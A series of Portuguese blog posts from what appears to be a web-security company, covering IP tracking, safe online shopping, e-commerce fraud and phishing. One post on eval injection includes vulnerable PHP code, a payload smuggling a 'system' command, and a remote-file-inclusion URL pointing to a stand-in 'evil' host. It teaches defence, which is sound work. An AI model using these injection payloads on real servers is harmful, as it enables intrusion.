1 – Quando nos conectamos à internet nosso computador ganha um endereço IP (Internet Protocol ou Protocolo de Internet).

2 – Esse endereço é fornecido pelo provedor de internet que utilizamos (UOL, Terra, IG e outros) e permite navegarmos pela rede.

3 – Os provedores armazenam usuários e senhas que fazem o acesso, bem como o endereço IP utilizado na conexão.

4 – Ao desligar seu modem e ligá-lo novamente você ganha um outro endereço, o qual passa pelo processo acima e assim sucessivamente.

Em alguns casos, geralmente o de empresas, o IP que dá acesso a internet é sempre o mesmo, o que chamamos de IP fixo. Mas, quando falamos de empresas, podemos ter 2 computadores internos ou 2.000 e aí, como funciona?

As empresas possuem redes que são configuradas para que cada computador tenha um endereço IP em uma faixa diferente, podendo começar por 10. ou 168. ou 192., e nesse caso quem grava qual o computador que estava utilizando o IP X, é a empresa.

Resumindo, significa que se você envia um e-mail de dentro da empresa, será possível após receber o e-mail, saber qual o endereço IP da empresa e qual o endereço IP do computador que o enviou, e o mesmo vale para arquivos que são baixados por programas de compartilhamento ou sites acessados diretamente.

Existem formas de mascarar esse endereço, algumas complexas, outras nem tanto, e geralmente quem utiliza desse recurso o faz para executar alguma ação ilegal, porém é importante salientar que em todos os casos é possível, através de um rastreamento complexo, chegar ao destinatário ou em alguns casos ao culpado.

É isso aí…

Nosso cenário de tecnologia é bastante propício a fraudes e certamente isso deriva de uma cultura de segurança muito nova ou quase que inexistente dos usuários em geral, e não apenas de uma legislação ainda “manca”.

É muito importante avaliar não apenas os preços encontrados e a estética do site, mas também fatores que podem determinar se você está seguro quanto a seus dados, sua privacidade e claro, sobre a ética e atuação da empresa onde você irá comprar.

Alguns passos muito importantes para a realização de sua compra:

1. Tenha a certeza de que o site que você está é realmente aquele que você digitou;

2. Verifique antes de comprar se o site oferece dados de contato legítimos, entre eles e-mail, telefone e endereço;

3. Faça pesquisas sobre o site na internet e procure identificar opiniões de pessoas que já tenham comprado neste mesmo local;

4. Leia atentamente a política de privacidade e de qualidade (compra, pagamentos, devolução, fretes, prazos, valores, etc) e se possível, pesquise no site da Receita Federal (www.receita.fazenda.gov.br) o CNPJ da empresa conferindo sua validade e autenticidade;

5. Ao efetuar a compra, antes de digitar seus dados pessoais e de pagamento, tenha a certeza de que a área que você está é restrita e segura. Isso é possível identificando a barra de endereços do navegador utilizado que muda de “HTTP” para “HTTPS” e também no lado direito superior a imagem de um cadeado de segurança. Clique sobre ele, de modo que a janela a ser aberta permita saber que o certificado de segurança exibido (cadeado) é válido e pertence empresa em questão;

6. Lembre-se, certificados de segurança não garantem que o site é seguro, mas sim que o site é autêntico e que as informações trafegadas no ambiente seguro são criptografadas. A simples exibição de selos não significa que o site realmente é autêntico, pois esses selos podem ser copiados. Para conferir sua autenticidade, sempre clique sobre a imagem do selo e confira os dados. Após o clique na imagem, se nada ocorrer, significa provavelmente que ela foi clonada;

7. Complementando, lembre-se também que boa parte de sua segurança depende da correta utilização de seu PC, leia mais em nosso artigo sobre mantenha seu PC Seguro.

É muito comum encontrarmos artigos técnicos e não técnicos comentando sobre invasões em computadores, redes, certificados digitais SSL ou sites seguros, afinal, diante da infinidade de facilidades e benefícios que a internet nos traz, temos também o número de fraudes que cresce assustadoramente todos os dias, fazendo o assunto estar sempre em alta.

Hackers ou crackers? Serão esses os grandes responsáveis por esse aumento no número de fraudes? Serão assim tão complexas as ações que permitem o aumento das estatísticas? Independente de como minha aplicação ou website for feito, se eu tiver um certificado digital SSL, terei segurança? O que você realmente sabe sobre isso???

É importante sabermos que existem diferenças entre hackers e crackers, e que em grande parte das vezes que algum tipo de incidente ocorre, nenhum deles estava diretamente envolvido. Devido a vulnerabilidades existentes nos websites, aplicações, etc, basta que pessoas com o mínimo de conhecimento e um pouco de persistência vasculhem a web em busca de ferramentas que permitam identificar explorar as vulnerabilidades existentes, e teremos mais um fato que irá contribuir para o aumento das estatísticas.

Enquanto o mercado se expande e várias empresas de todos os portes abrem portas na internet, um problema mais grave acaba muitas vezes esquecido, tornando-se um grande vilão: A segurança em aplicações web. Chegando ao grande ponto dessa questão, a falta de segurança adequada nas aplicações web, é culpa do desenvolvedor e de quem não a exige.

No e-commerce a culpa também é nossa, pois compramos sem pesquisar o suficiente e sem exigir do lojista as garantias adequadas, criando assim um ciclo contínuo de irresponsabilidade digital. Devemos pesquisar mais, saber que um certificado digital SSL apenas garante a criptografia dos dados no momento da transação e que determinado site é verdadeiro, mas não garante a segurança do website, e é estritamente necessário que ao pensarmos em desenvolver algo, devemos fazê-lo com um profissional que tenha conhecimento nesse assunto e que conheça e adote as melhores práticas de segurança, incluindo normatizações específicas como, por exemplo, o PCI – Payment Card Industry (veja mais em https://www.pcisecuritystandards.org (inglês) ou http://www.visanet.com.br/VOL/portals/visaNetPub.portal?_nfpb=true&_pageLabel=nDiferencialSegurancaPvsiPage (português).

Temos acompanhado muitos testes realizados em diversos websites de e-commerces e institucionais, além de muitos fóruns fechados que tratam do assunto, e o resultado não é nada agradável. Infelizmente, muitos desses sites exibem um selo de “Site Seguro”, mas não são. Nenhum ambiente é 100% seguro para essa afirmação, e não estamos falando dos melhores hackers do mundo ou crackers, mas sim de pessoas com pouco conhecimento em segurança que conseguem muitas vezes obter acesso à websites com a utilização de pouquíssimos recursos, e isso independente da linguagem e banco de dados utilizados.

Não raros são os casos onde, usando apenas strings de validação como ‘or’ e alguns outros, membros de comunidades de segurança ou de hacking, informam que conseguiram acesso ao banco de dados do website com poderes de administração. O grande problema nesse caso são os campos de autenticação.

É importante, se você desenvolve, aprender sobre, se você busca o serviço, cobrar sobre, e se você usa a web para compras, se informar sobre. Apenas assim nos protegemos do aumento das fraudes e apoiamos um movimento único que busca o aumento da segurança de nossos dados, e claro, nossos bolsos.

É isso aí, fica aqui mais um post.

Um assunto que ganha proporções a cada dia, devido aos inúmeros casos que tornam-se notícias na mídia, são as falhas em e-commerces. Mas e a culpa? Afinal, muitas das vezes os consumidores sofrem com isso, pois fornecem os seus dados no cadastro.

O erro mais freqüente apontado são falhas de programação, motivo pelo qual dezenas de reportagens apontam que mais de 80% dos sites de e-commerce existentes contém falhas de programação. As empresas cortam custos muitas vezes onde não deviam, optam por mão de obra não qualificada, contratam autodidatas, e o resultado é o prejuízo com dezenas de falhas de segurança que comprometem parcial ou totalmente o website, além de muitas vezes sacrificar os servidores com lentidão.

Muitas dessas falhas são extremamente graves e podem custar um bom dinheiro para as empresas que não tomam o devido cuidado. Existem “brechas” para ambientes Microsoft e Linux e para algumas delas é possível encontrar centenas de programas prontos que podem ser usados ou ir além disso e passar ao ambiente de desenvolvimento de códigos. Para tudo isso existem pessoas capazes e pessoas muito capazes.

Imagine seu banco de dados sendo manipulado, copiado ou destruído. Isso é o que ocorre em centenas de websites que nem mesmo imaginam o problema que enfrentam, o que faz com que uma falha simples se torne uma falha gravíssima, pois não se dá atenção a essa prática que é explorada aos milhares.

Em muitos desses casos, empresas descobrem e crêem terem sido vítimas de hackers ou crackers, mas o invasor, devido a falta de atenção com que o assunto é tratado, pode ser simplesmente “alguém com pouquíssimo conhecimento técnico”. Exemplos disso são os problemas existentes nos campos de login “usuário e senha” ou “e-mail e senha”, onde pode-se obter acesso como se fosse outro usuário e alterar ou deletar cadastros armazenados pelo site para obter informações pessoais sobre usuários.

Existem ainda situações de softwares que criam campos de login automaticamente sem que programadores utilizem códigos, e alguns desses softwares, como por exemplo o Ultradev, já tem uma vulnerabilidade de segurança que permite obter acesso a qualquer invasor.

O aumento de serviços on-line tem feito com que muitas empresas optem pela rapidez, criando problemas no mínimo funcionais, e claro, grandes problemas de segurança, já que esta última não entra no cronograma do projeto.

Análises de segurança e empresas sérias são itens fundamentais ao pensar em criar um website, ainda mais quando esse será focado em serviços on line. Basta lermos um pouco sobre o assunto e saberemos que a diferença entre os websites que prestam melhores serviços e vendem mais não está apenas na qualidade e nos preços, mas sim nos que oferecem segurança real a seus clientes.

Eu não compraria um produto com excelente preço se eu souber que meus dados podem ir parar na mão de pessoas que certamente os usarão para a prática de atos ilegais. E você?

Hoje atuamos em todas as camadas de segurança na web, emitindo certificados digitais de todos os tipos, analisando websites, servidores, appliances e códigos de sistemas e desenvolvendo controles e políticas para o atendimento aos requisitos do negócio.

Como previmos no começo de 2009, essa “nova velha empresa” nos surpreendeu com a dinâmica e ascenção que teve. Ganhamos muitos grandes clientes, tais como a TAM, CLARO, DROGASIL, LABORATÓRIO FLEURY, TODESCHINI e tantas outras empresas de renome internacional, que confiaram seus negócios aos nossos e tornaram-se parceiros nessa caminhada rumo ao sucesso.

Os projetos e desafios são grandes neste novo ano. Muitas coisas boas estão por vir que agregarão alto valor a TrustSign e à todos os envolvidos. Nossa equipe está muito bem preparada para atender com qualidade e simpatia e assim queremos continuar o sucesso em 2010.

Agradecemos a todos que estão nos acompanhando em nosso Blog, Twitter e Site. Os números de acessos às nossas ferramentas de relacionamento cresceram significativamente e por isso também queremos reafirmar o compromisso de em 2010 continuar levando matérias interessantes sobre o mundo digital, o compromisso com a responsabilidade social e o trabalho em equipe.

Um ótimo ano a todos nós,

É o que desejamos a todos os amigos blogueiros, clientes e parceiros.
Equipe TrustSign!

Natal, sinônimo de consumo.
Você busca os menores preços e encontra na internet uma boa ferramenta para achá-los, mas… Você sabe onde está pisando? Será que o site onde está colocando os “pés do seu cartão de crédito” é realmente seguro? Porque onde tem grande demanda, para os vilões significa “oportunidade de ganhar dinheiro ilegalmente”.

Não foram poucos os tópicos aqui postados com reclamações de empresas que efetivamente foram criadas para fraudar consumidores, e não estamos falando de empresas que tem problemas com logística.

Assim foi a saga de muitos internautas, que esperavam passar o natal com um presente que compraram para si ou para outros. Alguns que compraram produtos para a empresa onde trabalham e agora sabendo que caíram em um golpe preocupam-se com o seu “natal”, pois certamente não será fácil.

Muitos internautas perguntam até onde vai a impunidade, outros acreditam que não há leis suficientes, outros criam grupos de discussão para os lesados na esperança de que com a troca de informações possam obter ao menos parte do prejuízo, e agora falamos de compras de R$ 27,00 e de compras de R$ 4.000,00, e de um número de usuários fraudados que ultrapassa o número de 2.000 em um único site, então não falamos de fraudes pequenas, mas de casos que quando levados a justiça deveriam ter um desfecho mais rápido.

Exemplos clássicos foram recebidos aqui no Blog, lojas que ainda em operação fraudavam usuários a todo o tempo, reclamações e denúncias sobre as lojas e relatos de conhecimento das autoridades competentes, porém o tempo de investigação aparentemente muito longo foi um dos ítens que propiciou a possibilidade das fraudes, o que deu tempo de sobra para que as quadrilhas montassem seu golpe, aplicassem por 2 MESES e depois simplesmente sumissem do lugar. Agora o mais incrível, lojas idênticas e com coincidências inacreditáveis eram abertas com outros nomes 1 semana depois, e novamente o golpe aplicado por 1 a 2 MESES e mesmo assim, apesar das inúmeras reclamações dos internautas, novamente a história se repetiu e a quadrilha “ESCAFEDEU-SE” do lugar onde estavam, geralmente conjuntos comerciais na região central velha de São Paulo.

Dizer que é apenas importante tomar cuidados quando nas compras on-line já é pouco. Existem fóruns, blogs e sites com várias dicas de segurança. A cada dia o número de fraudes aumenta e a tendência é de que isso continue.

Hoje torna-se comum ver a polícia federal prender quadrilhas que roubam senhas de usuários e com isso desviam milhões, mas precisamos agora nos atentar e nos movimentar no sentido de que torne-se comum ver a polícia prender quadrilhas que aplicam golpes fazendo-se passar por lojas de e-commerce sérias.

Finalizamos apresentando um relato que conta a SAGA da internauta lesada Rita Gunther.

POR FAVOR SOLICITO QUE A PRESENTE SEJA LIDA NO AR E SEJA TAMBÉM LEVADA AO CONHECIMENTO DA LINHA DIRETA COM A JUSTIÇA, POR SE TRATAR DE ASSUNTO DE INTERESSE DA POPULAÇÃO EM FACE AO NÚMERO DE CONSUMIDORES ELETRONICOS!!!!

1º E-mail
MICROSIGOL… A SAGA…

ATÉ QUE ME PROVEM O CONTRÁRIO, A EMPRESA SUPRA CITADA ESTÁ SE MOSTRANDO NÃO CONFIÁVEL.

2º E-mail
À MICROSIGOL:

CÓPIA NA INTEGRA DO EMAIL ENCAMINHA À MICROSIGOL ANTE A NÃO ENTREGA DE 3 PRODUTOS ADQUIRIDOS E JÁ DESCONTADA A PARCELA RELATIVA AO VALOR DESTES EM MEU CARTÃO DE CRÉDITO , FATURA DE 25/11.

RESPOSTA DA EMPRESA:

Boa tarde, Seu pedido foi confirmado dia 13/11. Após a confirmação de seu pagamento existe um prazo de até 10 dias úteis para envio de seu produto, tempo que corresponde ao processamento da demanda de produtos pelo setor de expedição, pois trabalhamos com uma cota diária de envios. Assim que seu produto for postado receberá um e-mail com o código de rastreio.

Angela Departamento de Vendas (16) 3501-1079//3501-1086
www.microsigol.com.br

3º E-mail

De: Fale Conosco –
Rita Giselda Ignarra Gunther Enviada em:
quinta-feira, 22 de novembro de 2007 11:28
Referente: Crítica
Assunto: envio de 3 notebooks

Observacao: Bom dia. Gostaria de ter informações eficiente sobre o envio de 3 notes que adquiri em 09 e 12 deste mês. Cada vez q ligo me dão informações distintas. Saliento outrossim que tendo em vista que já foi feito o recebimento da parcela correspondente, sem vcs me terem entregue o produto, há violação do Cód. do consumidor, o qual em não me sendo enviado imediatamente os produtos que estou aguardando, será acionado, além da suspensão do pagamento das demais parcelas junto ao cartão de crédito, por meio de mandado de segurança. No aguardo de providencias efetivas, Rita Gunther

Infelizmente é isso que vemos hoje e continuamos esperando que espaços como o nosso possam servir para ajudar não apenas com informações públicas, mas na diminuição desses casos.

document.getElementById(”meubotaovoltar”).onclick = function () {
if (historicode1 == “home”) { //historicode1 é minha variável que recebe o valor do último item clicado
location.href=”home.htm”; //faz a chamada da página
} else if (historicode1 == “contatos”) {
location.href=”contatos.htm”
}

E a seguir o mesmo código acima porém utilizando a função eval():

document.getElementById(”meubotaovoltar”).onclick = function () {
eval(”location.href=”+historicode1+”.htm”);
}

A função minimizou totalmente o código. Por tratar o conteúdo de forma dinamica a função Eval() pode ser abusada de varias formas e um dos ataques mais difundidos é o Eval Injection.
Este ataque consiste na injeção de scripts que não são validados de forma apropriada pelo input de dados de usuário como parâmetro no site. Um usuário remoto pode inserir uma URL especialmente criada para enviar dados arbitrários para a função eval(). Isso resultará na execução do código pelo sistema vulneravel.
O ataque irá executar o código com a mesma permissão que o web service está executando no servidor remoto, isso inclui comandos executados no sistema.

Exemplo 01 : Sistema vulnerável a Eval Injection.
Vejamos o código abaixo:
$myvar = “varname”;
$x = $_GET[’arg’];
eval(”\$myvar = \$x;”);

Como pode ser visto acima a variavel $arg é repassada via parametro GET e em seguida é processada dentro da chamada eval(). Poderiamos explorar facilmente isto setando o valor da variavel para “10; system(\”/bin/passwd\”);”. Neste caso o webserver iria executar o comando no sistema e exibiria todos os usuários do Linux;

Exemplo 2: Injetando arquivos remotes para explorar a função vulnerável.
Vejamos o código a seguir:

$color = 'blue';
if ( isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
require( $color . '.php' );
?>

Colocando red/blue o programador pensou que poderia garantir que somente blue.php e red.php poderiam ser carregados. Porem como qualquer um poderia simplesmente inserir dados arbitrários na variável COLOR, é possivel injetar códigos a partir de arquivos:
• /vulnerable.php?COLOR=http://evil/exploit : Isto injetaria um arquivo remoto malicioso
• /vulnerable.php?COLOR=C:\ftp\upload\exploit : Isto poderia carregar um arquivo que foi feito upload para o server.

Como podem ver as vulnerabilidades relacionadas a dados inseridos como variáveis não validadas podem trazer diversos problemas, em especial a função eval() por ser utilizada em larga escala pode prejudicar consideravelmente a segurança de sua aplicação e servidores.

Nunca lhe ocorreu de um dia, de repente, um e-mail surgir em sua caixa postal, e por mais incrível que pareça ele traz informações sobre assuntos de seu interesse, uma promoção imperdível de um produto que você pesquisa há tempos, ou algo parecido?

Há vários interessados em saber como você gasta seu dinheiro, quais são seus hábitos de consumo, tipos de websites que você visita e muito mais. Isso permite que empresas montem perfis sobre potenciais consumidores e dessa forma aproveitam as oportunidades que o mundo virtual oferece, direcionam suas camapnhas de marketing e tentam propiciar ao internauta maior interatividade e facilidade de navegação.

Websites rastreiam seu computador quando você entra navega nele, a partir daí, links acessados, dias, horários, tempo de exibição, número de clicks, tudo pode ser monitorado.

Quando você se conecta a internet, seu computador ganha um endereço chamado IP ou traduzindo Protocolo de Internet, isso permite também que dados como o país, cidade e tipo de conexão (discada ou banda larga) também sejam identificadas, além disso você utiliza um navegador para acessar os sites, isso também é identificado.

Conforme já mencionado no artigo Invasão de Privacidade I, os sites podem ou não lhe informar de que forma fazem isso, tudo depende da transparência da empresa e essa informação deve estar disponível na Política de Privacidade.

Existem ferramentas e configurações que permitem a você controlar o uso dos arquivos que permitem obter essas informações, mas isso será comentado no próximo post.

Você sabe quais são os métodos utilizados para o roubo de identidade ou informações? Se não sabe, esse artigo é para você…

A cada dia a quantidade de fraudes e roubos de identidades crescem em um número alarmante, as técnicas para isso? Muitas, vamos nos próximos posts comentar sobre algumas:

Cavalos de tróia, vírus e outros

Seu objetivo é o de roubar informações do computador da vítima, danificar arquivos (no caso de vírus) ou usar o computador para sua propagação. São muito comuns em páginas de “phishing”, ou seja, páginas falsas que aparentemente são originais.

Tomemos por exemplo a página de bancos onde você coloca suas informações, você abriu seu navegador e digitou o endereço do banco ou você recebeu um e-mail informando que o banco está recadastrando seus dados e clicou no link que havia lá? Se for a segunda opção certamente você tem um problema. Bancos e instituições sérias como Serasa, TIM, RECEITA FEDERAL e outras, não enviam e-mails com esse objetivo.

Em 99,9% dos casos fraudadores é utilizado esse recurso para roubar senhas e dados restritos dos internautas, dessa forma pessoas sem escrúpulo fingem ser empresas sérias e aproveitam da credibilidade dessas para obter benefícios financeiros.

Algumas dicas para não cair em armadilhas virtuais:

1 – Nunca clique sobre links recebidos por e-mails;
2 – Desconfie de e-mails milagrosos e de pessoas que você não conhece, na dúvida, APAGUE;
3 – Prefira sempre digitar endereço de websites;
4 – Antes de digitar qualquer dado pessoal em uma área do website, tenha a certeza de que está em uma área segura, o que pode ser feito reparando na barra de endereços do navegador, a qual deve mudar de HTTP para HTTPS, aparecendo ainda do lado direito inferior um pequeno cadeado, clique sobre ele e confira se o site em questão realmente pertence a empresa que representa e se é válido;
5 – Na dúvida, antes de qualquer ação entre em contato com o responsável pelo site e pergunte.
Certamente alguns minutos ao telefone são menos inconvenientes do que horas de dor de cabeça por um simples clique.

Nó artigo “Invasão de Privacidade II” , que será postado na próxima quarta-feira, dia 25/11, abordaremos “Quais informações os websites colhem e como eles fazem isso”.

Até lá!

O Evento foi conduzido por Renato Meirelles – Especialista no segmento de baixa renda e, pela Dra. Patricia Peck - advogada de Direito Digital.

Hoje, cerca de *85% da população brasileira pertence às classe C, D e E, assim como *69% dos cartões de crédito estão nas mãos desse público. Dessa forma, as empresas que oferecem venda online precisam se adaptar, e dar melhor acesso, a esse perfil de consumidor que atualmente movimenta R$760 bilhões por ano.

Os temas do Fórum, tais como: “Estratégias cognitivas de excelência na autenticação da baixa renda”, “Evolução da baixa renda no comércio eletrônico” e “Entendendo como a baixa renda compra no comércio eletrônico”, foram abordados com riqueza de detalhes, onde trabalhou-se a sensibilidade para com as relações em geral, afinal a internet é “o mundo da confiança” e quando é entendido o perfil dos usuários e consegue-se definir com qual deles a empresa está se comunicando, é muito mais fácil as relações fluirem bem.

Os departamentos de marketing e comercial da TrustSign estavam presentes, disponibilizando informações sobre os serviços que possibilitam a troca mais segura na web e apresentando produtos de qualidade para todos que estão (ou querem entrar) nesse segmento de mercado tão atual e rentável.

*Fonte: Data Popular e Datafolha